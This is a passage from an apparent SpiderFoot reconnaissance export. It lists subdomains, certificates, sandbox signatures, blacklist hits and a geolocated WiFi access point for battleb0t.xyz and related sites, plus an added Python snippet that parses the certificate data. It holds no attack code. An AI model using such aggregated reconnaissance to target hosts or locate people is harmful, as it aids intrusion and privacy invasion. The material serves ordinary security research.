"104.21.6.166:443"\n "142.250.189.202:443"\n "172.217.12.104:443"\n "172.217.164.99:443"\n "142.251.46.174:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"bouncefitness.precisiongroup.com.au"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"bouncefitness.precisiongroup.com.au"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"* Copyright 2011-2016 Twitter, Inc." 
(Indicator: "twitter")\n "<a class="elementor-icon elementor-social-icon elementor-social-icon-twitter elementor-repeater-item-37c2364" target="_blank">" (Indicator: "twitter")\n "<i class="fab fa-twitter"></i></a>" (Indicator: "twitter")\n "<noscript><style id="rocket-lazyload-nojs-css">.rll-youtube-player, [data-lazy-src]{display:none !important;}</style></noscript>" (Indicator: "youtube")\n "<span class="elementor-screen-only">Twitter</span>" (Indicator: "twitter")\n "function Ey(a,b){var c=this;return b}Ey.O="internal.enableAutoEventOnScroll";var cc=fa(["data-gtm-yt-inspected-"]),Fy=["www.youtube.com","www.youtube-nocookie.com"],Gy,Hy=!1;" (Indicator: "youtube")\n "function Ry(a,b){var c=this;return b}Ry.O="internal.enableAutoEventOnYouTubeActivity";var Sy;function Ty(a){var b=!1;return b}Ty.O="internal.evaluateMatchingRules";" (Indicator: "youtube")\n "transportUrl:b,context:c},Q(91);else{var f="/gtag/destination?id="+encodeURIComponent(a)+"&l="+Qh.ka+"&cx=c";cs()&&(f+="&sign="+Qh.ue);var g=fi||hi?bs(b,f):void 0;g||(g=Po("https://","http://",Qh.Jd+f));Rl().destination[a]={state:1,context:c};mc(g)}};function ds(){if(vl()){return!0}return!1};var gs=new RegExp(/^(.*\\.)?(google|youtube|blogger|withgoogle)(\\.com?)?(\\.[a-z]{2})?\\.?$/),hs={cl:["ecl"],customPixels:["nonGooglePixels"],ecl:["cl"],ehl:["hl"],hl:["ehl"],html:["customScripts","customPixels","nonGooglePixels","nonGoogleScripts","nonGoogleIframes"],customScripts:["html","customPixels","nonGooglePixels","nonGoogleScripts","nonGoogleIframes"],nonGooglePixels:[],nonGoogleScripts:["nonGooglePixels"],nonGoogleIframes:["nonGooglePixels"]},is={cl:["ecl"],customPixels:["customScripts","html"]," (Indicator: "youtube")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': 
u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "KFOlCnqEu92Fr1MmEU9fBBc-_1_.woff" has type "Web Open Font Format TrueType length 20544 version 1.1"- [targetUID: N/A]\n "~DFAE12B4DD5D9EF57E.TMP" has type "data"- Location: [%TEMP%\\~DFAE12B4DD5D9EF57E.TMP]- [targetUID: 00000000-00000836]\n "lazyload.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "548YBEKT.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\548YBEKT.txt]- [targetUID: 00000000-00002848]\n "solid.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "P8ST09HS.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\P8ST09HS.txt]- [targetUID: 00000000-00000836]\n "style.min_1_.css" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "preloaded-elements-handlers.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "webpack.runtime.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "frontend-modules.min_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "_17DA973C-BEDC-11ED-8783-080027090D53_.dat" has type "Composite Document File V2 Document Cannot read short stream"- [targetUID: N/A]\n "animations.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "waypoints.min_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "post-1477_1_.css" has type "ASCII text with very 
long lines with no line terminators"- [targetUID: N/A]\n "wp-polyfill.min_1_.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: N/A]\n "bounce_logo_2_.png" has type "PNG image data 264 x 130 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "swiper.min_1_.css" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "flexslider_1_.css" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Heuristic match: "\ufffd\ufffd3>q\ufffd\ufffd[>\ufffd\ufffdd\ufffd*CgY\ufffdI\u043b\ufffd\xb9*\ufffdS\ufffdS\ufffd=\ufffd:\ufffdw\ufffdb/~\ufffd\ufffd\ufffd\ufffd?<<\ufffd{\ufffdT \ufffd\ufffdM\ufffdZ0\ufffd\ufffd\ufffdF\ufffd,\ufffdU\ufffd]\ufffd\ufffdtll\ufffdM\ufffd\ufffd[\ufffd\ufffd\u06be\ufffd\ufffd\ufffddz\ufffd\ufffd;\ufffd7\ufffd\ufffdN\ufffd\ufffd\ufffd\ufffd\ufffdw\ufffdn#\ufffd\ufffdN>@)mN\ufffd?>\ufffd\ufffd\ufffd\u0785R\ufffd\ufffd`\uac7e\ufffdQ\ufffd$z/\ufffd2\ufffd\ufffdx\ufffdM\ufffdG\ufffdk\ufffdf6Ip\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdg\ufffd\ufffdnX4d\ufffd\ufffd\ufffde.0.\ufffd\ufffd\ufffd!/\ufffd\ufffd\ufffd\ufffd^\ufffd=z\ufffd5\ufffd\ufffd\ufffd\ufffd\'\ufffdhCh\ufffd7\ufffd\u0290\ufffd\ufffd\ufffd\ufffdj\ufffd:\u0760\ufffd\u059eUP?\ufffd\ufffdU\ufffdH+h\ueb420\ufffd\ufffd\ufffd\ufffd\ufffd[\ufffdh\ufffd3D\ufffd\ufffd*\ufffdS\ufffdzWAD7!\ufffd>\ufffdd\ufffdBhm\ufffd{fK\ufffdz\ufffd\ufffd"\n Pattern match: "T.HZ/1\ufffd\ufffd\ufffd\ufffd\ufffdb\u02ca\ufffd1"\n Pattern match: "https://twitter.com/intent/tweet?text={text"\n Pattern match: "https://+a+.google-analytics.com/g/collect},IA=function(){var"\n Pattern match: 
"http://www.w3.org/2000/svg,svg"\n Pattern match: "https://cct.google/taggy/agent.js"\n Pattern match: "http://getbootstrap.com"\n Pattern match: "https://fontawesome.com"\n Pattern match: "http://api.jqueryui.com/position/"\n Pattern match: "http://jquery.org/license"\n Pattern match: "http://jqueryui.com"\n Pattern match: "http://swiperjs.com"\n Pattern match: "https://fontawesome.com/license/free"\n Pattern match: "https://github.com/twbs/bootstrap/blob/master/LICENSE"\n Pattern match: "http://www.w3.org/2000/svg"\n Pattern match: "http://jqueryui.com*"\n Pattern match: "github.com/necolas/normalize.css"\n Pattern match: "https://github.com/h5bp/html5-boilerplate/blob/master/src/css/main.css"\n Pattern match: "https://wp-rocket.me"\n Pattern match: "https://fonts.googleapis.com/css?family=Roboto%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic%7CRoboto%20Slab%3A100%2C100italic%2C200%2C200it"\n Pattern match: "https://bouncefitness.precisiongroup.com.au/"\n Pattern match: "https://bouncefitness.precisiongroup.com.au/my-account/"\n Pattern match: "http://www.w3.org/2000/svg\'%20view | 104.21.6.166 |
| 2023-05-12 03:00:43 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.55): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:01:32 | Web Technology | No | Tool - WhatWeb | 0 | 0 | 3 | 0 | None | HTML5 | vscode.battleb0t.xyz |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:53:10:73) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 02:44:15 | Internet Name | No | DNS Resolver | 2 | 0 | 2 | 0 | None | nuke.battleb0t.xyz | [{u'pubkey_sha256': u'b1d8ad495b85281ccdd8ee8835d1b0223d8372b54869daf463e92de6ed172160', u'cert_sha256': u'3d687aa671181674e4491f35d4a504fe8ede2a23edcb11a1a5f1573f42d7a75d', u'revoked': False, u'not_after': u'2023-05-14T15:23:50Z', u'not_before': u'2023-02-13T15:23:51Z', u'cert': {u'data': u'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', u'sha256': u'3d687aa671181674e4491f35d4a504fe8ede2a23edcb11a1a5f1573f42d7a75d', u'type': u'cert'}, u'dns_names': [u'nuke.battleb0t.xyz'], u'tbs_sha256': u'2c51d3eac2fd15713d1b21dd3bb3fdf96ca51847d8b13529deb5504b935d64ba', u'id': u'4818192950', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afadb5813dcfbcf286d', u'friendly_name': u"Let's Encrypt", u'name': u"C=US, O=Let's Encrypt, CN=R3"}}, {u'pubkey_sha256': u'2307411ab1a35cbd27d910826dd73a859c805fd0ba153a66badcd9b93076677b', u'cert_sha256': u'2cdb8130792ebedf9ac0d58415aa9e7a972b41beabd3a80ba0f9545951c3653a', u'revoked': False, u'not_after': u'2023-05-25T03:02:52Z', u'not_before': u'2023-02-24T03:02:53Z', u'cert': {u'data': u'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', u'sha256': u'2cdb8130792ebedf9ac0d58415aa9e7a972b41beabd3a80ba0f9545951c3653a', u'type': u'cert'}, u'dns_names': [u'fluid.battleb0t.xyz'], u'tbs_sha256': u'8146e2bbb69c6bf3a769558c8c5ae10b8e6243d42611ba7db2c4f0b16bf71146', u'id': u'4865007011', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afadb5813dcfbcf286d', u'friendly_name': u"Let's Encrypt", u'name': u"C=US, O=Let's Encrypt, CN=R3"}}, {u'pubkey_sha256': u'5a0559923d0fdaac1fc6a74472ffcb94c92e25a29d8d9a48166bcad2947f18e1', u'cert_sha256': u'9e1451e17fa41309ec5c8a34246eeed3388677fd9907141ad0f5dedc2241e10e', u'revoked': False, u'not_after': u'2023-05-25T03:05:10Z', u'not_before': u'2023-02-24T03:05:11Z', u'cert': {u'data': 
u'MIIFMTCCBBmgAwIBAgISBJEIZbRWlOOJN2vI7lr89IBSMA0GCSqGSIb3DQEBCwUAMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJSMzAeFw0yMzAyMjQwMzA1MTFaFw0yMzA1MjUwMzA1MTBaMCExHzAdBgNVBAMTFm9sZGZsdWlkLmJhdHRsZWIwdC54eXowggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCXS5qUM658XpEb2FQiye1Pjdwc6oLnwWa4DnrXaX6XESwapQ5kFhLVlLMj8jbUT+vVMlCs5NdmG+PakXkEZvQt+j5F9EiRGo2AgsrdZhjN8p2HDZYJNvCQUHSzj9HUq+U8uqatV2IiK2DebnYEAl36UoC3YWvKiQ5ROMPyTcGPPlwvhux67sSpCWf+OjYs9HHdY1LHfiQTO/hkrA8XZYtPEtu6i5bXp9Nc/Y/pJrDB086upICbjZsf9spKiE++7SgvRRKN7ShK4dcK0cxPOA/6ky2NSpI6iIIBJKdiUpWIy/Uh604fFFn7oPNTbG4g4coLg0Y2NMYiFxvY5oIkaMplAgMBAAGjggJQMIICTDAOBgNVHQ8BAf8EBAMCBaAwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMAwGA1UdEwEB/wQCMAAwHQYDVR0OBBYEFNUp10YCZXNl/PWnfC5vlnnYZ6TmMB8GA1UdIwQYMBaAFBQusxe3WFbLrlAJQOYfr52LFMLGMFUGCCsGAQUFBwEBBEkwRzAhBggrBgEFBQcwAYYVaHR0cDovL3IzLm8ubGVuY3Iub3JnMCIGCCsGAQUFBzAChhZodHRwOi8vcjMuaS5sZW5jci5vcmcvMCEGA1UdEQQaMBiCFm9sZGZsdWlkLmJhdHRsZWIwdC54eXowTAYDVR0gBEUwQzAIBgZngQwBAgEwNwYLKwYBBAGC3xMBAQEwKDAmBggrBgEFBQcCARYaaHR0cDovL2Nwcy5sZXRzZW5jcnlwdC5vcmcwggEDBgorBgEEAdZ5AgQCBIH0BIHxAO8AdgC3Pvsk35xNunXyOcW6WPRsXfxCz3qfNcSeHQmBJe20mQAAAYaBmKzyAAAEAwBHMEUCICWgaft/PmN9oILwvZn6/4Qgr8WGgSRL98ur+169a4dWAiEAilZEKCsL5dY69BV+Cjy6gEc40xNl1o6o5QEE0+3XKCQAdQB6MoxU2LcttiDqOOBSHumEFnAyE4VNO9IrwTpXo1LrUgAAAYaBmK0EAAAEAwBGMEQCIEhQdyenjelORFvktFZQ+yD8yP0PS9xoCKRWpUv1pUezAiBBtKAPIhxp6PP7YLKBYWLg3Sg3E350KyZ04f3lTSlh5zANBgkqhkiG9w0BAQsFAAOCAQEAYbTvc/w81jb1dYAMM4uaBQvE73IdaXSV/QqEvbi5PBKH0+sttdJjKilgWcQRHA/D+3kvikNXOGLYLmg0u2wOeuP4PfXBBaVtk7mzSCKOozlm5qWe3OKYNX6z4ceyFrewLnBQTuqT0PhcaWwb0j7u2mQfrZfIvhc4pu2SnjvbZ8iwX+av/fdXknuHPb/EwSETusTYhaNj3JDu3z0qvANOuhuMDBZ+WOOsf9w7QBgfdJjVxPoymZWgZB5bTaj1eTMuP0PcjQ59KCV0epMnUy5rrk2BwTzgzUICbfza81JX1bFwjhqRFcgbk81AuP8p58YFrWOMyOzX6Ygzo11DodW5IA==', u'sha256': u'9e1451e17fa41309ec5c8a34246eeed3388677fd9907141ad0f5dedc2241e10e', u'type': u'cert'}, u'dns_names': [u'oldfluid.battleb0t.xyz'], u'tbs_sha256': 
u'11231ecf169618aac453b5e600bca74016c90998389238bc78e25a336ea53b60', u'id': u'4865013513', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afadb5813dcfbcf286d', u'friendly_name': u"Let's Encrypt", u'name': u"C=US, O=Let's Encrypt, CN=R3"}}, {u'pubkey_sha256': u'b65f3ba1cf72aeba89e3a802dee04c06a05e779c0cfeacdd6cb8cefb55c4e2da', u'cert_sha256': u'cb894c56576f5179076d6e1c59c2fc91b3c72b3d588e1a67aa08729c92b84b1f', u'revoked': False, u'not_after': u'2023-05-26T01:39:24Z', u'not_before': u'2023-02-25T01:39:25Z', u'cert': {u'data': u'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', u'sha256': u'cb894c56576f5179076d6e1c59c2fc91b3c72b3d588e1a67aa08729c92b84b1f', u'type': u'cert'}, u'dns_names': [u'battleb0t.xyz', u'www.battleb0t.xyz'], u'tbs_sha256': u'5d9c34221e2de124f32114bf34c005fc414285d1b7cc7cab0bb0bd4e745c7797', u'id': u'4869370950', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afa |
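The Source Data of the row above is the raw result of the certificate search for nuke.battleb0t.xyz, and it is not JSON: SpiderFoot stores raw module output as a Python repr (u'' strings, False/None, nested dicts) and the export truncates long fields. What a practitioner wants out of a record like this is the hostname list it leaks (nuke, fluid, oldfluid, www under battleb0t.xyz, all issued by Let's Encrypt R3) and the validity windows relative to the scan time. The example below is added here and is not SpiderFoot's code. It re-types the four certificate entries from the row with the base64 cert blobs and public-key hashes dropped, parses the repr safely with ast.literal_eval instead of eval(), lists the SANs, and flags certificates that expire within a given number of days of the row's Date Found (2023-05-12 02:44:15).

```python
import ast
from datetime import datetime, timedelta

# Constructed from the row above: its four certificate entries, re-typed with the base64
# 'cert' blobs and pubkey hashes removed to keep the input short. This is the Python-repr
# format SpiderFoot emits for raw module data (u'' strings, False/None), not JSON.
RAW_SOURCE_DATA = """[
 {u'cert_sha256': u'3d687aa671181674e4491f35d4a504fe8ede2a23edcb11a1a5f1573f42d7a75d',
  u'revoked': False, u'not_after': u'2023-05-14T15:23:50Z', u'not_before': u'2023-02-13T15:23:51Z',
  u'dns_names': [u'nuke.battleb0t.xyz'], u'id': u'4818192950',
  u'issuer': {u'friendly_name': u"Let's Encrypt", u'name': u"C=US, O=Let's Encrypt, CN=R3"}},
 {u'cert_sha256': u'2cdb8130792ebedf9ac0d58415aa9e7a972b41beabd3a80ba0f9545951c3653a',
  u'revoked': False, u'not_after': u'2023-05-25T03:02:52Z', u'not_before': u'2023-02-24T03:02:53Z',
  u'dns_names': [u'fluid.battleb0t.xyz'], u'id': u'4865007011',
  u'issuer': {u'friendly_name': u"Let's Encrypt", u'name': u"C=US, O=Let's Encrypt, CN=R3"}},
 {u'cert_sha256': u'9e1451e17fa41309ec5c8a34246eeed3388677fd9907141ad0f5dedc2241e10e',
  u'revoked': False, u'not_after': u'2023-05-25T03:05:10Z', u'not_before': u'2023-02-24T03:05:11Z',
  u'dns_names': [u'oldfluid.battleb0t.xyz'], u'id': u'4865013513',
  u'issuer': {u'friendly_name': u"Let's Encrypt", u'name': u"C=US, O=Let's Encrypt, CN=R3"}},
 {u'cert_sha256': u'cb894c56576f5179076d6e1c59c2fc91b3c72b3d588e1a67aa08729c92b84b1f',
  u'revoked': False, u'not_after': u'2023-05-26T01:39:24Z', u'not_before': u'2023-02-25T01:39:25Z',
  u'dns_names': [u'battleb0t.xyz', u'www.battleb0t.xyz'], u'id': u'4869370950',
  u'issuer': {u'friendly_name': u"Let's Encrypt", u'name': u"C=US, O=Let's Encrypt, CN=R3"}}
]"""

SCAN_TIME = datetime(2023, 5, 12, 2, 44, 15)   # 'Date Found' of the row above
TS = "%Y-%m-%dT%H:%M:%SZ"


def parse_source_data(raw):
    """json.loads() rejects u'' and False; ast.literal_eval evaluates literals only, so it
    parses SpiderFoot's repr without the code-execution risk of eval()."""
    return ast.literal_eval(raw)


def hostnames(certs):
    """Every SAN seen across the certificates: a subdomain list straight from cert search."""
    return sorted({name for c in certs for name in c["dns_names"]})


def lifetime_days(cert):
    """Issued lifetime in whole days (Let's Encrypt issues 90 days minus one second)."""
    not_before = datetime.strptime(cert["not_before"], TS)
    not_after = datetime.strptime(cert["not_after"], TS)
    return round((not_after - not_before).total_seconds() / 86400)


def expiring(certs, scan_time, within_days):
    """(first SAN, whole days left) for certs expiring within `within_days` of scan_time,
    soonest first. Negative days means the cert had already expired when the scan ran."""
    out = []
    for c in certs:
        left = datetime.strptime(c["not_after"], TS) - scan_time
        if left <= timedelta(days=within_days):
            out.append((c["dns_names"][0], left.days))
    return sorted(out, key=lambda item: item[1])


if __name__ == "__main__":
    certs = parse_source_data(RAW_SOURCE_DATA)
    print(hostnames(certs))
    print(expiring(certs, SCAN_TIME, 7))
```

Measured from the row's Date Found, the nuke.battleb0t.xyz certificate had two days left while the other three were mid-lifetime; for a 90-day Let's Encrypt certificate that is normal if renewal is automated, and worth a second look if the host has otherwise gone quiet.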
| 2023-05-12 03:00:44 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.57): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:44:19 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | github.io | 185.199.110.153 |
| 2023-05-12 03:18:25 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | SoundCloud (Category: music)
https://soundcloud.com/Altpapier | Altpapier |
| 2023-05-12 03:09:38 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 230.30.196.104.bc.googleusercontent.com | 104.196.30.230 |
| 2023-05-12 03:13:07 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [00d.github.io]
https://www.openphish.com/feed.txt | 00d.github.io |
| 2023-05-12 02:53:15 | IP Address | No | Mnemonic PassiveDNS | 0 | 0 | 1 | 0 | None | 185.199.109.153 | battleb0t.xyz |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | cf-ray: 7c5f605eb97732c7-EWR | {"transfer-encoding": "chunked", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "server": "cloudflare", "connection": "keep-alive", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:20 GMT", "x-frame-options": "SAMEORIGIN", "referrer-policy": "same-origin", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f605eb97732c7-EWR"} |
| 2023-05-12 02:44:15 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | HTTP/3 | nwapi2.battleb0t.xyz |
| 2023-05-12 02:48:50 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://privaterelay.appleid.com', u'type': u'extracted', u'verdict': u'malicious'}]}, u'total_processes': 2, u'threat_score': 39, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'scale.com', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"Local\\ZonesLockedCacheCounterMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_b74_IESQMMUTEX_0_303"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_b74_ConnHashTable<2932>_HashTable_Mutex"\n "UpdatingNewTabPageData"\n "IsoScope_b74_IESQMMUTEX_0_519"\n "IsoScope_b74_IESQMMUTEX_0_331"\n "Local\\ZonesCacheCounterMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_b74_IE_EarlyTabStart_0xc7c_Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2932"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_b74_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-103', u'name': u'Spawns new processes that are not known child processes', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1057', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-573', u'attck_id': u'T1057', u'relevance': 3, u'threat_level': 0, u'type': 9, u'description': u'Spawned process "iexplore.exe" with commandline "SCODEF:2932 CREDAT:275457 /prefetch:2" 
(UID: 00000000-00003740)'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-25', u'name': u'Spawns new processes', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1057', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-573', u'attck_id': u'T1057', u'relevance': 3, u'threat_level': 0, u'type': 9, u'description': u'Spawned process "iexplore.exe" with commandline "SCODEF:2932 CREDAT:275457 /prefetch:2" (UID: 00000000-00003740)'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-21', u'name': u'Launches a browser', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 9, u'description': u'Launches browser "iexplore.exe" (UID: 00000000-00003740)'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.110.153:443"\n "13.227.78.82:443"\n "104.17.24.14:443"\n "142.251.214.130:80"\n "104.17.68.176:443"\n "157.240.22.25:80"\n "157.240.22.25:443"\n "13.227.74.4:443"\n "13.227.74.28:443"\n "104.19.154.83:443"\n "104.17.214.204:443"\n "34.107.204.85:443"\n "142.251.46.238:443"\n "142.251.214.130:443"\n "142.250.191.34:443"\n "13.227.74.9:443"\n "216.239.32.178:443"\n "151.101.24.157:443"\n "169.150.221.147:443"\n "104.16.101.12:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"www.googleadservices.com"\n "connect.facebook.net"'}, 
{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"analytics.twitter.com"\n "connect.facebook.net"\n "data.pendo.io"\n "js.hs-banner.com"\n "track.hubspot.com"\n "ws.zoominfo.com"\n "www.googleadservices.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"<!DOCTYPE html><html><head><meta charSet="utf-8"/><title>Accelerate the Development of AI Applications | Scale AI</title><meta name="description" content="Trusted by world class companies\n Scale delivers high quality training data for AI applications such as self-driving cars\n mapping\n AR/VR\n robotics\n and more."/><meta name="twitter:card" content="summary_large_image"/><meta name="twitter:site" content="@scale_AI"/><meta name="twitter:creator" content="@scale_AI"/><meta property="og:title" content="Accelerate the Development of AI Applications | Scale AI"/><meta property="og:description" content="Trusted by world class companies\n Scale delivers high quality training data for AI applications such as self-driving cars\n mapping\n AR/VR\n robotics\n and more."/><meta property="og:url" content="https://scale.com/"/><meta property="og:type" content="website"/><meta property="og:image" content="https://www.scale.com/static/images/global/facebook.png"/><meta property="og:image:alt" content="OG Image Alt"/><meta propert" (Indicator: "twitter")\n "ite">press@scale.com</a></li><div class="flex gap-3 mt-8 text-neutral-400"><a href="https://twitter.com/scale_ai"><svg 
xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" class="w-5 h-5 duration-300 ease-in-out fill-current transition-color hover:text-white"><path d="M7.55 21.75c9.055 0 14.008-7.503 14.008-14.008 0-.21-.004-.426-.014-.637A9.999 9.999 0 0024 4.555c-.898.4-1.85.66-2.826.774a4.95 4.95 0 002.165-2.723 9.897 9.897 0 01-3.126 1.195 4.93 4.93 0 00-8.394 4.49A13.985 13.985 0 011.673 3.15a4.93 4.93 0 001.523 6.57 4.93 4.93 0 01-2.23-.614v.061a4.922 4.922 0 003.95 4.828 4.894 4.894 0 01-2.221.085A4.934 4.934 0 007.292 17.5 9.875 9.875 0 010 19.54a13.969 13.969 0 007.55 2.211z"></path></svg></a><a href="https://www.facebook.com/scaleapi"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" class="w-5 h-5 duration-300 ease-in-out fill-current transition-color hover:text-white"><path d="M24.147 12.073C24.147 5.405 18.74 0 12.073 0S0 5.405 0 12.073C0 18.1 4.415 23.094 10.187 24v-8.437H7.12v-3.49h" (Indicator: "facebook.com")\n "3.066v-2.66c0-3.025 1.802-4.697 4.56-4.697 1.32 0 2.703.236 2.703.236v2.971h-1.523c-1.5 0-1.967.93-1.967 1.887v2.263h3.348l-.535 3.49H13.96V24c5.772-.906 10.187-5.9 10.187-11.927z"></path></svg></a><a href="https://www.linkedin.com/company/scaleai"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" class="w-5 h-5 duration-300 ease-in-out fill-current transition-color hover:text-white"><path d="M22.223 0H1.772C.792 0 0 .773 0 1.73v20.536C0 23.222.792 24 1.772 24h20.451c.98 0 1.777-.778 1.777-1.73V1.73C24 .773 23.203 0 22.223 0zM7.12 20.452H3.558V8.995H7.12v11.457zM5.34 7.434a2.064 2.064 